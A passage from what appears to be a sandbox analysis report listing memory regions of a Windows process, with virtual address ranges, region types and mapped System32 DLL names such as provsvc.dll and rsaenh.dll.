= mapped_file name = "snmptrap.exe" filename = "\\Windows\\System32\\snmptrap.exe" (normalized: "c:\\windows\\system32\\snmptrap.exe") Region: id = 3976 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "snmptrap.exe.mui" filename = "\\Windows\\System32\\en-US\\snmptrap.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\snmptrap.exe.mui") Region: id = 3980 start_va = 0x7fefab20000 end_va = 0x7fefab50fff monitored = 0 entry_point = 0x7fefab21b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3988 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 3989 start_va = 0x7fefa920000 end_va = 0x7fefa950fff monitored = 0 entry_point = 0x7fefa921b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3990 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 3991 start_va = 0x7fefab20000 end_va = 0x7fefab50fff monitored = 0 entry_point = 0x7fefab21b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3992 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 3994 start_va = 0x7fefa920000 end_va = 0x7fefa950fff monitored = 0 entry_point = 0x7fefa921b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3995 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 3996 start_va = 0x7fefab20000 end_va = 0x7fefab50fff monitored = 0 entry_point = 0x7fefab21b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3997 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 3998 start_va = 0x7fefa920000 end_va = 0x7fefa950fff monitored = 0 entry_point = 0x7fefa921b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 3999 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 4000 start_va = 0x7fefab20000 end_va = 0x7fefab50fff monitored = 0 entry_point = 0x7fefab21b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 4001 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 4002 start_va = 0x7fefa920000 end_va = 0x7fefa950fff monitored = 0 entry_point = 0x7fefa921b24 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 4003 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "provsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\provsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\provsvc.dll.mui") Region: id = 4022 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4023 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4024 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4025 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4026 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4027 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4028 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4029 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4030 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4031 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4032 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4033 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4034 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4035 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4036 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4037 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4038 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4039 start_va = 0x2b0000 end_va = 0x2c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4053 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4054 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4055 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4056 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4057 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4058 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 4159 start_va = 0x1970000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 4160 start_va = 0x7fef8df0000 end_va = 0x7fef8e1bfff monitored = 0 entry_point = 0x7fef8df56f8 region_type = mapped_file name = "dps.dll" filename = "\\Windows\\System32\\dps.dll" (normalized: "c:\\windows\\system32\\dps.dll") Region: id = 4169 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4170 start_va = 0x120000 end_va = 0x120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 4171 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4172 start_va = 0x2b0000 end_va = 0x2b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4173 start_va = 0x7fefb4f0000 end_va = 0x7fefb616fff monitored = 0 entry_point = 0x7fefb4f10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4180 start_va = 0x1060000 end_va = 0x10dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001060000" filename = "" Region: id = 4181 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4185 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4187 start_va = 0x2c0000 end_va = 0x2c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4188 start_va = 0x2c0000 end_va = 0x2c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4481 start_va = 0x2d0000 end_va = 0x2d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 4482 start_va = 0x2e0000 end_va = 0x2e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4483 start_va = 0x2f0000 end_va = 0x2f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 4484 start_va = 0x300000 end_va = 0x302fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 4485 start_va = 0x310000 end_va = 0x313fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4486 start_va = 0x320000 end_va = 0x321fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 4487 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4488 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4489 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4490 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4491 start_va = 0x860000 end_va = 0x860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4492 start_va = 0x870000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 4493 start_va = 0x880000 end_va = 0x880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 4494 start_va = 0x890000 end_va = 0x890fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 4495 start_va = 0x8a0000 end_va = 0x8a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 4496 start_va = 0x8b0000 end_va = 0x8b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 4497 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 4498 start_va = 0x8d0000 end_va = 0x8d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 4499 start_va = 0x8e0000 end_va = 0x8e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 4508 start_va = 0x1a10000 end_va = 0x1a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a10000" filename = "" Region: id = 4509 start_va = 0x7fef7a30000 end_va = 0x7fef7a48fff monitored = 0 entry_point = 0x7fef7a32b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 4510 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4538 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4539 start_va = 0x7fef78b0000 end_va = 0x7fef79f9fff monitored = 0 entry_point = 0x7fef78b1100 region_type = mapped_file name = "diagperf.dll" filename = "\\Windows\\System32\\diagperf.dll" (normalized: "c:\\windows\\system32\\diagperf.dll") Region: id = 4540 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 4569 start_va = 0x2d0000 end_va = 0x2d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 4603 start_va = 0x1a90000 end_va = 0x1b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 4604 start_va = 0x1b30000 end_va = 0x1baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 4605 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 4606 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 4607 start_va = 0x1c70000 end_va = 0x1ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 4608 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 4611 start_va = 0x7fef7670000 end_va = 0x7fef7677fff monitored = 0 entry_point = 0x7fef76722f8 region_type = mapped_file name = "pnpts.dll" filename = "\\Windows\\System32\\pnpts.dll" (normalized: "c:\\windows\\system32\\pnpts.dll") Region: id = 4613 start_va = 0x1d80000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 4614 start_va = 0x7fef7450000 end_va = 0x7fef7459fff monitored = 0 entry_point = 0x7fef74538cc region_type = mapped_file name = "pots.dll" filename = "\\Windows\\System32\\pots.dll" (normalized: "c:\\windows\\system32\\pots.dll") Region: id = 4615 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 4671 start_va = 0x7fef7360000 end_va = 0x7fef7432fff monitored = 0 entry_point = 0x7fef7361f1c region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 4675 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 4676 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4678 start_va = 0x2e0000 end_va = 0x2e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 4679 start_va = 0x2f0000 end_va = 0x2fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 4690 start_va = 0xc10000 end_va = 0xc8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 4691 start_va = 0x7fef7310000 end_va = 0x7fef732cfff monitored = 0 entry_point = 0x7fef7311a28 region_type = mapped_file name = "radardt.dll" filename = "\\Windows\\System32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll") Region: id = 4692 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 4706 start_va = 0x7fefbb00000 end_va = 0x7fefbb10fff monitored = 0 entry_point = 0x7fefbb01070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4709 start_va = 0x1e00000 end_va = 0x1fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4710 start_va = 0x1fc0000 end_va = 0x21c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 4711 start_va = 0x1bf0000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 4712 start_va = 0x21d0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 4713 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 4714 start_va = 0x7fef94b0000 end_va = 0x7fef9523fff monitored = 0 entry_point = 0x7fef94b66f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4715 start_va = 0x7fefb690000 end_va = 0x7fefb6a4fff monitored = 0 entry_point = 0x7fefb6960d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4716 start_va = 0x5c0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4717 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4718 start_va = 0x970000 end_va = 0x9b4fff monitored = 0 entry_point = 0x971064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4719 start_va = 0x9d0000 end_va = 0xa4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 4720 start_va = 0x970000 end_va = 0x9b4fff monitored = 0 entry_point = 0x971064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4721 start_va = 0x970000 end_va = 0x9b4fff monitored = 0 entry_point = 0x971064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4722 start_va = 0x970000 end_va = 0x9b4fff monitored = 0 entry_point = 0x971064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4723 start_va = 0x970000 end_va = 0x9b4fff monitored = 0 entry_point = 0x971064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4724 start_va = 0x7fef7300000 end_va = 0x7fef730cfff monitored = 0 entry_point = 0x7fef7306fb0 region_type = mapped_file name = "wdiasqmmodule.dll" filename = "\\Windows\\System32\\wdiasqmmodule.dll" (normalized: "c:\\windows\\system32\\wdiasqmmodule.dll") Region: id = 4728 start_va = 0x2400000 end_va = 0x247ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4729 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4730 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 4731 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 4736 start_va = 0x24d0000 end_va = 0x254ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 4737 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 4738 start_va = 0x310000 end_va = 0x31cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-power-events.dll") Region: id = 4739 start_va = 0x74300000 end_va = 0x7430dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll" filename = "\\Windows\\System32\\microsoft-windows-kernel-power-events.dll" (normalized: "c:\\windows\\system32\\microsoft-windows-kernel-power-events.dll") Region: id = 4740 start_va = 0x320000 end_va = 0x322fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-kernel-power-events.dll.mui" filename = "\\Windows\\System32\\en-US\\microsoft-windows-kernel-power-events.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\microsoft-windows-kernel-power-events.dll.mui") Region: id = 4798 start_va = 0x25e0000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 4799 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 4800 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4801 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4802 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4803 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4804 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4805 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4806 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4807 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4808 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4809 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4810 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4811 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4812 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4813 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4814 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4815 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4816 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4817 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4818 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4819 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4820 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4821 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4822 start_va = 0x7fef7350000 end_va = 0x7fef735bfff monitored = 0 entry_point = 0x7fef735602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4840 start_va = 0x7fefd330000 end_va = 0x7fefd351fff monitored = 0 entry_point = 0x7fefd335d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4882 start_va = 0x2660000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 4883 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4884 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4885 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4886 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4887 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4888 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4889 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4890 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4891 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4892 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4893 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4894 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4895 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4896 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4897 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4898 start_va = 0x310000 end_va = 0x322fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4899 start_va = 0x310000 end_va = 0x322fff monitored 